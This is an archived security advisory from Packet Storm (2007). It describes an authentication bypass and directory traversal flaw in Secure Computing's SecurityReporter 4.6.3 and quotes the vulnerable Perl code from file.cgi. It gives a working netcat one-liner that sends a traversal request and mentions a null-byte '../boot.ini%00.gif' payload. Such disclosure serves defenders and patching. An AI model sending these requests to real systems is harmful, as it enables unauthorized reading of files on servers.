exploit the possibilities
Home Files News &[SERVICES_TAB]About Contact Add New

securityreporter-traverse.txt

securityreporter-traverse.txt
Posted Jul 24, 2007
Authored by Oliver Karow | Site oliverkarow.de

SecurityReporter version 4.6.3 from Secure Computing suffers from an authentication bypass and directory traversal vulnerability.

tags | exploit, file inclusion
SHA-256 | f4901ba96169fe7851bc008d68821446e8d148ac28c43703ca3180cbe68dbde8

securityreporter-traverse.txt

Change Mirror Download
SECURITYREPORTER - AUTHENTICATION BYPASS AND DIRECTORY TRAVERSAL
VULNERABILITY

Product: SecurityReporter
Version: 4.6.3 Build Date: 04/20/2007
Platform: Win32
Vendor: Secure Computing (www.securecomputing.com)

Product Description
-------------------

"SecurityReporter is a security event analysis and reporting solution
for the
Sidewinder Security Appliance, providing realtime security intelligence
to help
decipher hacker/virus behavior, combat security threats, and help meet
compliance requirements."

Vendor Description
------------------

SecurityReporter is manufactured under an OEM partnership between
Secure Computing and eIQnetworks. The product is also known as "Network
Security Analyzer". According to eIQnetworks, Security Analyzer is also
part of products of the following companies:

- Top Layer Networks
- Clavister
- Astaro
- Reflex Security
- H3C
- Piolink
- MiraPoint


Vulnerability-Overview
----------------------

SecurityReporter is vulnerable to an authentication bypass and directory
traversal attack.
It is possible to access files inside and outside the application root
directory from remote without authentication.

During the installation of SecurityReporter it can be chosen between an
dedicated Apache installation (which is included within the install
package) and the usage of an
pre-installed Internet Information Server.

In case of the Apache, access to the files is executed with local system
account privileges by default.


Exploitation
------------

The following request fetches the sourcecode of the script itself, but
can also be used to access any other file on the partition:

echo -e "GET /cgi-bin/file.cgi?name=/eventcache/../cgi-bin/file.cgi
HTTP/1.0\r\n\r\n" | nc <ip> <port>


Vulnerability Details
---------------------

The authentication can be bypassed because of the following code within
"file.cgi":

8 $name = $field{'name'};
9
10 #for gif images we dont care about authorization so just serve it
without
11 #bothering the reporting engine again. See bug: 3676 for
details.
12 $dontvalidate = "false";
13 if ($name =~ /^[a-zA-Z0-9\-\. _\/ ]+\.(gif)$/) {
14 $dontvalidate = "true";
15 print "Content-Type: image/gif\n";
16 binmode STDOUT;
17 }
18 elsif ($name =~ /^\/eventcache\//) {
19 $dontvalidate = "true";
20 print "Content-Type: text/html\n";
21 binmode STDOUT;
22}

If the value of the parameter "name" does not match to line 13 (which
can be enforced by not requesting a ".gif" file) the condition in line
18 is checked.
If the value of "name" does start with the directory "/eventcache/",
$dontvalidate is set to "true", thus disabling uservalidation.

(addition: the regex in line 13 could be bypassed with null-byte attack
in older versions of this application, by requesting a file like
../../../../boot.ini%00.gif. But this is fixed in the current version
within the file GeneralUtilities.pm which is included to most pl-files)

The directory traversal is possible because there is no normalization of
the input and filtering of dots and slashes/backslashes within
"file.cgi":

165 #on windows 2003 IIS the cur dir is the root itself- dont
know why so we try to open it in
166 #path relative to root if ../ from cgi-bin fails
167 open(f, "../$name") or open(f, "$name") or die "File
($name): $!";


PATCH
-----

All SecurityReporter customers have been sent an email by the venodr,
describing the vulnerability with a link to a patch.

Discovered
----------

By Oliver Karow (oliver.karow@gmx.de) on Tuesday, 05. June 2007
http://www.oliverkarow.de/research/securityreporter.txt


Login or Register to add favorites

File Archive:

April 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Apr 1st
    10 Files
  • 2
    Apr 2nd
    26 Files
  • 3
    Apr 3rd
    40 Files
  • 4
    Apr 4th
    6 Files
  • 5
    Apr 5th
    26 Files
  • 6
    Apr 6th
    0 Files
  • 7
    Apr 7th
    0 Files
  • 8
    Apr 8th
    22 Files
  • 9
    Apr 9th
    14 Files
  • 10
    Apr 10th
    10 Files
  • 11
    Apr 11th
    13 Files
  • 12
    Apr 12th
    14 Files
  • 13
    Apr 13th
    0 Files
  • 14
    Apr 14th
    0 Files
  • 15
    Apr 15th
    30 Files
  • 16
    Apr 16th
    10 Files
  • 17
    Apr 17th
    22 Files
  • 18
    Apr 18th
    45 Files
  • 19
    Apr 19th
    0 Files
  • 20
    Apr 20th
    0 Files
  • 21
    Apr 21st
    0 Files
  • 22
    Apr 22nd
    0 Files
  • 23
    Apr 23rd
    0 Files
  • 24
    Apr 24th
    0 Files
  • 25
    Apr 25th
    0 Files
  • 26
    Apr 26th
    0 Files
  • 27
    Apr 27th
    0 Files
  • 28
    Apr 28th
    0 Files
  • 29
    Apr 29th
    0 Files
  • 30
    Apr 30th
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2022 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close